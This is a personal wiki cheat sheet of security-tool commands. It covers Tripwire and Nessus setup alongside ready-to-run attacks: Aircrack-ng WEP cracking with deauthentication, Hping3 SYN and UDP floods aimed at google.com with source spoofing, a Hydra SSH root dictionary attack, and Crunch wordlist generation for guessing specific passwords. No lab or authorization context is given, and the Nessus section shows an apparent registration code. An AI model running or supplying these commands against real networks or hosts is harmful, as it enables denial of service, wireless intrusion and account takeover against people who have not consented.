Hacking Misc

From Network Security Wiki


Aircrack-NG

airmon-ng stop mon0
airmon-ng start wlan0
airodump-ng --channel 8 --write output --bssid 00:19:5B:E7:52:70 mon0
aireplay-ng --arpreplay -e g0tmi1k -b 00:19:5B:E7:52:70 -h 00:12:17:94:90:0D mon0
aireplay-ng --deauth 10 -a 00:19:5B:E7:52:70 -c 00:12:17:94:90:0D mon0
aircrack-ng output*.cap
ifconfig wlan0 down
iwconfig wlan0 essid g0tmi1k
iwconfig wlan0 key 59EF19C76A
ifconfig wlan0 up
dhclient wlan0

Tripwire

apt-get install tripwire
chmod 0600 tw.cfg tw.pol

edit the default policy, check out /etc/tripwire/twpol.txt, comment out any files or folders you do not want to be checked. Once done:

twadmin --create-polfile --cfgfile ./tw.cfg --site-keyfile ./site.key ./twpol.txt

Initialising the database:

 
 tripwire --init --cfgfile /etc/tripwire/tw.cfg --polfile /etc/tripwire/tw.pol --site-keyfile /etc/tripwire/site.key --local-keyfile /etc/tripwire/aman-Inspiron-1440-local.key

System Checks:

tripwire --check

Updating the policy:

 
 tripwire --update-policy --cfgfile ./tw.cfg --polfile ./tw.pol --site-keyfile ./site.key --local-keyfile ./aman-Inspiron-1440-local.key ./twpol.txt

Regular Updates:

tripwire --update -Z low

If you have recently run a check and want the update to proceed using your most recent report file, then use the -r option and provide the report filename that you want the update to use.

tripwire --update -Z low --twrfile host-yyyymmdd-tttttt.twr

Nessus

Installation:

sudo /opt/nessus/bin/nessus-fetch --register 7421-23D5-E7CF-6757-9020
sudo /opt/nessus/sbin/nessus-adduser
sudo /opt/nessus/sbin/nessus-service -q -D
sudo /etc/init.d/nessusd start
sudo /etc/init.d/nessusd stop
sudo /opt/nessus/sbin/nessus-update-plugins
sudo /opt/nessus/bin/nessus-fetch --check

Disable and remove Startup scripts:

sudo update-rc.d -f nessusd disable
sudo update-rc.d -f nessusd remove

Usage:

https://localhost:8834/
Add policy:"home"
Uncheck "Denial of Service" in "Plugins"
Preferences > Donot check fragile devices > Check "Scan Network Printer"

Uninstall:

rm -rf /opt/nessus

Upgrade:

/etc/init.d/nessusd stop
dpkg -i Nessus-4.x.x-ubuntu910_i386.deb
/etc/init.d/nessusd start

Hping3

SYN flood to google.com's port 80

hping3 google.com -p 80 -i u30000 -S

UDP flood google.com:

hping3 google.com -p 80 -i u30000 --udp
hping3 10.66.10.42 -p 80 -i u10 -S -d 100000 --flood -y
-a 10.66.10.198     spoofing
-i u1000            100 packets for second
-i u10000	     10 packets for second
-d                  data size     
--flood             Sent packets as fast as possible
--rand-dest         random destionation address mode
--rand-source       random source address mode
-y --dontfrag       Set don't fragment IP flag

Hydra

Using Dictionary attack:

hydra -l root -P ~/dictionary/test.txt ssh://10.107.88.66 -t 1 -f -vV -o found.txt

Crunch

The basic syntax for crunch looks like this:

crunch <min> max<max> <characterset> -t <pattern> -o <output filename>

Now, let’s go over what’s included in the syntax above.

min=              The minimum password length.
max=              The maximum password length.
characterset=     The character set to be used in generating the passwords.
-t <pattern>=     The specified pattern of the generated passwords. 
-o <outputfile>=  This is the file you want your wordlist written to.

To generate pasword list with birth date 0728 (July 28):

crunch 10 10 -t @@@@@@0728 -o birthdaywordlist.lst

Creating a list for password like: "Citrix.aman#"

crunch 12 12 Citrx.#@aman -t Citrix@@@@@@ -o xensrvpwd.txt

This would be even better choice as we will have a smaller file

crunch 12 12 .#@%! -t Citrix@aman@ -o xensrvpwd.txt

Using Rainbow Charset:

cat /usr/share/rainbowcrack/charset.txt
crunch 8 8 -f /usr/share/rainbowcrack/charset.txt mixalpha -o alphawordlist.lst



References





{{#widget:DISQUS |id=networkm |uniqid=Hacking Misc |url=https://aman.awiki.org/wiki/Hacking_Misc }}